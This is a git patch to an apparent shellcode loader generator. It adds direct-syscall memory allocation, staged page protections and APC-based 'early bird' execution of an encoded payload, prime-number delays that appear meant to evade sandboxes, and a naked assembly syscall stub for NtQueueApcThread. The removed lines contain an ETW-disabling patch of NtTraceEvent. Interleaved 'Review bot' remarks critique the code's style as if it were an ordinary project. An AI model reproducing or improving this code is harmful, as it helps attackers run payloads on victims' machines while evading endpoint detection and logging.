From 6f30183ff37aad00886c5af117704e5a71487dc7 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E7=8E=8B=20=E9=B8=BF=E5=84=92?= <1350141940@qq.com>
Date: Tue, 9 Apr 2024 17:29:27 +0800
Subject: [PATCH] =?UTF-8?q?=E5=AE=8C=E5=96=84syscall=E4=B8=8Bearlybird?=
 =?UTF-8?q?=E5=8A=A0=E8=BD=BD=E6=96=B9=E5=BC=8F?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 Loader/Template.go | 56 ++++++++++++++--------------------------------
 sys_32.c | 39 ++++++++++++++++++++++++++++++++
 sys_32.h | 7 ++++++
 3 files changed, 63 insertions(+), 39 deletions(-)

diff --git a/Loader/Template.go b/Loader/Template.go
index 1450655..63b45a8 100644
--- a/Loader/Template.go
+++ b/Loader/Template.go
@@ -10,9 +10,9 @@ var __c__sandbox = `
 isPrime(1000000000000002217);
 isPrime(1000000000000002137);
 isPrime(1000000000000002097);
- //isPrime(1000000000000002049);
- //isPrime(1000000000000001953);
- //isPrime(1000000000000002481);
+ isPrime(1000000000000002049);
+ isPrime(1000000000000001953);
+ isPrime(1000000000000002481);
 `
@@ -28,21 +28,20 @@ var __c__syscall_callback = `
 EnumCalendarInfo((CALINFO_ENUMPROC)addr, LOCALE_USER_DEFAULT, ENUM_ALL_CALENDARS, CAL_SMONTHNAME1);
 `
 var __c__syscall__earlyBird = `
- LPVOID shellAddress = VirtualAlloc(NULL, allocationSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+ DWORD oldProtect;
 myNtTestAlert testAlert = (myNtTestAlert)(GetProcAddress(GetModuleHandleA("ntdll"), "NtTestAlert"));
- memcpy(shellAddress, xpp, allocationSize);
- //WriteProcessMemory(GetCurrentProcess(), shellAddress, buf, allocationSize, NULL);
-
-
- QueueUserAPC((PAPCFUNC)shellAddress, GetCurrentThread(), NULL);
- testAlert();
- //VAV_NtAllocateVirtualMemory(hProcess, &addr, 0, &allocationSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
- //VAV_NtWriteVirtualMemory(hProcess, addr, xpp, length, &bytesWritten);
- ////LPVOID addr1 = VirtualAlloc(NULL, sizeof(xpp), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
- ////RtlMoveMemory(addr1, xpp,length);
- ////QueueUserAPC((PAPCFUNC)addr1, GetCurrentThread(), NULL);
- //Sw3NtQueueApcThread(GetCurrentThread(),(PAPCFUNC)addr,NULL,NULL,NULL);
- //Sw3NtTestAlert();
+ VAV_NtAllocateVirtualMemory(GetCurrentProcess(), &addr, 0, &allocationSize, MEM_COMMIT | MEM_RESERVE, 0x04);
+ isPrime(1000000000000002049);
+ VAV_NtProtectVirtualMemory(GetCurrentProcess(),&addr, &allocationSize, 0x20, &oldProtect);
+ isPrime(1000000000000002049);
+ VAV_NtProtectVirtualMemory(GetCurrentProcess(),&addr, &allocationSize, 0x40, &oldProtect);
+ isPrime(1000000000000002049);
+ VAV_NtWriteVirtualMemory(GetCurrentProcess(), addr, xpp, length, NULL);
+ //VAVNtQueueApcThread(GetCurrentThread(),(PAPCFUNC)addr,NULL,NULL,NULL);
+ QueueUserAPC((PAPCFUNC)addr, GetCurrentThread(), NULL);
+ //VAVNtTestAlert();
+ testAlert();
+
 `
 // 纤程加载
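Review bot: The protection arguments of the three new syscall invocations are raw magic numbers (`0x04`, `0x20`, `0x40`) while the same call spells its allocation flags as `MEM_COMMIT | MEM_RESERVE`; the named Win32 constants `PAGE_READWRITE`, `PAGE_EXECUTE_READ` and `PAGE_EXECUTE_READWRITE` should be used instead so the intended protection of each step is readable (the removed VirtualAlloc line already named the last one). `VAVNtQueueApcThread` is added to sys_32.c and sys_32.h in this same commit, but its only reference here is the commented-out call, so as committed the new stub is dead code. `addr`, `allocationSize`, `length` and `xpp` are declared outside the hunk, so the template's enclosing declarations are not visible here.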
@@ -349,21 +348,10 @@ _Bool isPrime(long long n) {
 return 1;
 }
-DWORD PatchEtw()
-{
-DWORD dwOld = 0;
-FARPROC ptrNtTraceEvent = GetProcAddress(LoadLibraryA("ntdll"), "NtTraceEvent");
-VirtualProtect(ptrNtTraceEvent, 1, PAGE_EXECUTE_READWRITE, &dwOld);
-memcpy(ptrNtTraceEvent, "\xc3", 1);
-VirtualProtect(ptrNtTraceEvent, 1, dwOld, &dwOld);
-return 0;
-}
 int main()
 {
-
- PatchEtw();
- pNewLdrLoadDll LdrLoadrDll;
+ pNewLdrLoadDll LdrLoadrDll;
 UNICODE_STRING user32dll;
 UNICODE_STRING kernel32dll;
 UNICODE_STRING ntdlldll;
@@ -739,19 +727,9 @@ void My_Xor(char* data, size_t data_len, char* key, size_t key_len) {
 j++;
 }
 }
-DWORD PatchEtw()
-{
-DWORD dwOld = 0;
-FARPROC ptrNtTraceEvent = GetProcAddress(LoadLibraryA("ntdll"), "NtTraceEvent");
-VirtualProtect(ptrNtTraceEvent, 1, PAGE_EXECUTE_READWRITE, &dwOld);
-memcpy(ptrNtTraceEvent, "\xc3", 1);
-VirtualProtect(ptrNtTraceEvent, 1, dwOld, &dwOld);
-return 0;
-}
 int main()
 {
- PatchEtw();
 pNewLdrLoadDll LdrLoadrDll;
 UNICODE_STRING user32dll;
 UNICODE_STRING kernel32dll;
diff --git a/sys_32.c b/sys_32.c
index bb36a5e..9221164 100644
--- a/sys_32.c
+++ b/sys_32.c
@@ -429,6 +429,45 @@ __declspec(naked) NTSTATUS VAV_NtProtectVirtualMemory(
 );
 }
+__declspec(naked) NTSTATUS VAVNtQueueApcThread(
+ IN HANDLE ThreadHandle,
+ IN PKNORMAL_ROUTINE ApcRoutine,
+ IN PVOID ApcArgument1 OPTIONAL,
+ IN PVOID ApcArgument2 OPTIONAL,
+ IN PVOID ApcArgument3 OPTIONAL)
+{
+ asm(
+ "push ebp \n"
+ "mov ebp, esp \n"
+ "push 0x14BC1E11 \n"
+ "call _VAV_GetSyscallAddress \n"
+ "mov edi, eax \n"
+ "push 0x14BC1E11 \n"
+ "call _VAV_GetSyscallNumber \n"
+ "lea esp, [esp+4] \n"
+ "mov ecx, 0x5 \n"
+ "push_argument_14BC1E11: \n"
+ "dec ecx \n"
+ "push [ebp + 8 + ecx * 4] \n"
+ "jnz push_argument_14BC1E11 \n"
+ "mov ecx, eax \n"
+ "mov eax, ecx \n"
+ "lea ebx, [ret_address_epilog_14BC1E11] \n"
+ "push ebx \n"
+ "call do_sysenter_interrupt_14BC1E11 \n"
+ "lea esp, [esp+4] \n"
+ "ret_address_epilog_14BC1E11: \n"
+ "mov esp, ebp \n"
+ "pop ebp \n"
+ "ret \n"
+ "do_sysenter_interrupt_14BC1E11: \n"
+ "mov edx, esp \n"
+ "jmp edi \n"
+ "ret \n"
+ );
+}
+
+
 #endif
diff --git a/sys_32.h b/sys_32.h
index 269dc75..dc739ff 100644
--- a/sys_32.h
+++ b/sys_32.h
@@ -309,6 +309,13 @@ EXTERN_C NTSTATUS VAV_NtProtectVirtualMemory(
 IN ULONG NewProtect,
 OUT PULONG OldProtect);
+EXTERN_C NTSTATUS VAVNtQueueApcThread(
+ IN HANDLE ThreadHandle,
+ IN PKNORMAL_ROUTINE ApcRoutine,
+ IN PVOID ApcArgument1 OPTIONAL,
+ IN PVOID ApcArgument2 OPTIONAL,
+ IN PVOID ApcArgument3 OPTIONAL);
+
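Review bot: In the new VAVNtQueueApcThread body the pair `"mov ecx, eax \n"` / `"mov eax, ecx \n"` is a round trip that leaves eax unchanged and only copies it into ecx (which the `dec ecx` / `jnz` loop has just counted down to zero), and the final `"ret \n"` after `"jmp edi \n"` is unreachable; both read as generator residue and should be removed or justified with a comment. The function carries no comment at all; a one-line header such as `/* 32-bit naked stub for VAVNtQueueApcThread; target and number presumably come from _VAV_GetSyscallAddress/_VAV_GetSyscallNumber via the pushed 0x14BC1E11 value — confirm */` would tell the next reader what the hash push and the two helper calls are for, since neither helper is visible in this hunk. The matching declaration is added to sys_32.h, whose hunk ends outside this page.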